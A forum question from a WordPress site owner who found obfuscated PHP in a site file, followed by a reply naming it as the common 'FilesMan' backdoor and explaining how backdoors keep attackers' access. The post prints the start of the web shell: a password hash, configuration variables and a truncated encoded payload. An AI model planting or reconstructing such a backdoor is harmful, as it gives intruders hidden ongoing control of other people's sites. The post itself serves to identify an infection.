Today I checked my wordpress website and I observed that one php file had the following code in it:
According to THIS it is a encode(eval64)) hack. What`s the meaning of the code below? Is this the same as the base encode eval64 hack?
<?
$auth_pass = "2fba9596aec8aeb14a88461bbd708f97";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$xYEzDu6r3EZT="GR5yYXp3YH17ejRne3h9cGdgdWBxPDB5dX9xYWQ9NG8ZHjQ0NDQweHt4NCk0MzMvGR40NDQ0cntmPDB9KSQvMH00KDRnYGZ4cXo8MHl1f3FhZD0vMH0/KSY9NG8ZHjQ0NDQ0NDB4e3g6KXd8Zjx8cWxwcXc8Z2F2Z2BmPDB5dX9xYWQ4MH04Jj09PS8ZHjQ0NDRpGR40NDQ0ZnFgYWZ6NDB4e3gvGR5pGR4wZ3F9d3t4fXp/KWd7eH1wZ2B1YHE8MyYgIyciciMhIyYiJyIhJ3AiJiIlIyciISciJyAhciIgIiEiJyJyIiAiISYsIXUhLCF1IiwiJiAnIiwicSIhInAidyMhIXUicCMsIiwiICAjISEiciEtInAgIiN1IXUhICEtJyQhLCcmISYidyEtJyYnLSJ2IXUhJyIjInEgcSEjIC0jLCByISMhdScgIichICBwIyMiJSJ2ISUnICF1ICcnLScnIicgICEiICAgcCcnISYhJiImJyQnJScgIHEgISBxISYiJiJxIiwhdSEjISAhJiJ1IXUhLCMkICIhdSEjIHUgIyEiICwhdSchISEicSAlJyQiICAsIiMjIyF1JyUgIiEsIHAidyIsIyciJSEgIXUnJSBxISMidickIichIyAtIyIgcSclICYhISEgInUhdSEsISInJiMsInAhICEhISEnJSBxJycgdSclIiAgJyMgInAiJSMtJy0hJCEtISMgcSB2IScnJicsJyEhJiJ2IncgLCImI3UgIiAsIiYjdSJ3IC0hJyEhIicnJSEtInciIyN1IS0nJiMgI3UiICJwInYnJiE......
The code above is of a very common backdoor script called "FilesMan". Typically backdoor scripts are written in php. It is quite common for hackers to place a "baskdoor" on a site they have hacked. A backdoor can give a hacker continued access to the site even if the site owners changes account passwords. Backdoor scripts will vary from 100s of lines of code to 1 or 2 lines of code.
For details please visit the site http://aw-snap.info/articles/backdoor-examples.php